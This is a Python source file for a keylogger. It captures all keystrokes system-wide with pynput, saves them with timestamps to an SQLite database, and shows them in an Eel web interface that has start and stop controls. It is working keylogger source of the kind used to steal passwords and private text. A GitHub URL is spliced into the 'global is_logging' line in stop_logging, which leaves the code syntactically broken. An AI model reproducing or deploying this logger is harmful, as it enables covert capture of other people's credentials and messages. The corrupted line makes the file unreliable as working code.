"""
Keylogger Application (Expanded Version)
"""

import eel
from pynput import keyboard
import sqlite3
from datetime import datetime
import logging

# ==========================
# Configuration & Constants
# ==========================

DATABASE_PATH = 'keystrokes.db'
LOG_FILE = 'keylogger_debug.log'

# Global flag for keylogging control
is_logging = False

# ==========================
# Logging Configuration
# ==========================

logging.basicConfig(filename=LOG_FILE, level=logging.INFO, format='%(asctime)s:%(levelname)s:%(message)s')

# ==========================
# Database Setup
# ==========================

def setup_database():
    try:
        conn = sqlite3.connect(DATABASE_PATH)
        cursor = conn.cursor()
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS keystrokes (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                key_pressed TEXT,
                timestamp DATETIME
            )
        ''')
        conn.commit()
        logging.info("Database setup complete.")
    except Exception as e:
        logging.error(f"Error setting up database: {e}")
    finally:
        conn.close()

# ==========================
# Keystroke Handling
# ==========================

def log_keystroke(keystroke: str):
    try:
        conn = sqlite3.connect(DATABASE_PATH)
        cursor = conn.cursor()
        cursor.execute('''
            INSERT INTO keystrokes (key_pressed, timestamp)
            VALUES (?, ?)
        ''', (keystroke, datetime.now()))
        conn.commit()
        logging.info(f"Logged keystroke: {keystroke}")
    except Exception as e:
        logging.error(f"Error logging keystroke: {e}")
    finally:
        conn.close()

def on_press(key):
    if is_logging:
        try:
            keystroke = key.char
        except AttributeError:
            keystroke = str(key)
        log_keystroke(keystroke)

# ==========================
# Eel Frontend Bindings
# ==========================

@eel.expose
def start_logging():
    global is_logging
    is_logging = True
    logging.info("Keylogging started.")

@eel.expose
def stop_logging():
    global is_logginghttps://github.com/tanmaylmao/Keylogger/blob/main/ne3w
    is_logging = False
    logging.info("Keylogging stopped.")

@eel.expose
def fetch_keystrokes():
    try:
        conn = sqlite3.connect(DATABASE_PATH)
        cursor = conn.cursor()
        cursor.execute('SELECT key_pressed, timestamp FROM keystrokes ORDER BY timestamp DESC')
        results = cursor.fetchall()
        return results
    except Exception as e:
        logging.error(f"Error fetching keystrokes: {e}")
        return []
    finally:
        conn.close()

# ==========================
# Application Entry Point
# ==========================

def main():
    setup_database()
    eel.init('web')

    # Start key listener in background (daemon ensures it exits with main program)
    listener = keyboard.Listener(on_press=on_press)
    listener.daemon = True
    listener.start()

    # Start Eel app (blocks main thread)
    eel.start('index.html', size=(800, 600))

if __name__ == '__main__':
    main()
